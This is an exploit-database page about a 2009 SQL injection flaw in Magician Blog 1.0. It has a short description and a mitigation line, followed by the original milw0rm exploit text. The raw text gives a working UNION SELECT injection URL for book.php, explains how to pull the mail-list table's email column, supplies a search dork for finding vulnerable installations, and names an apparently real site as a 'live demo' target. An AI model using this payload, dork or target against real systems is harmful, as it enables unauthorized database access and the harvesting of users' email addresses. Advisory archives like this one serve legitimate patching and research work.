Magician Blog - exploit.company

vendor:

Magician Blog

by:

Evil-Cod3r

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Magician Blog

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:4smart:magician_blog

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Magician Blog <= 1.0 Remot SQL injection Valunrability

Magician Blog version 1.0 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to sensitive information stored in the database, such as user credentials and other sensitive data.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

==============================================================================
                      _      _       _          _      _   _
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                        

==============================================================================
        [Â»] ~ Note : Been Repoted The Programed
==============================================================================
        [Â»] Magician Blog <= 1.0 Remot SQL injection Valunrability
==============================================================================

    [Â»] Script:             [ Magician v1.0 ]
    [Â»] Language:           [ PHP ]
    [Â»] home:               [ www.4smart.net ]
    [Â»] Founder:            [ Evil-Cod3r <IE7@Windowslive.com - o41@hotmail.Com> ]
    [Â»] Gr44tz to:          [ Recru1t Qabandi - Sniper Code - Mr.SaFa7 - The g0bL!N - S4S-T3rr0ist ]
    [Â»] Dork:               [ "Powered By 4smart" ]
    [Â»] Price:              [ $300 But i Scanned The Nulled !! ]

###########################################################################

===[ Exploit SQL  ]===  
  
    [Â»] http://www.Site.com/path/book.php?do=show&ids=-1 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13--
    [Â»] Note : if you want mail list this is a table [ maillist ] the column > [email] and show mail list

  

===[ Live Demo ]===  

        [Â»] http://www.aloamman.com/
       

Author: Evil-Cod3r <-

###########################################################################

# milw0rm.com [2009-07-27]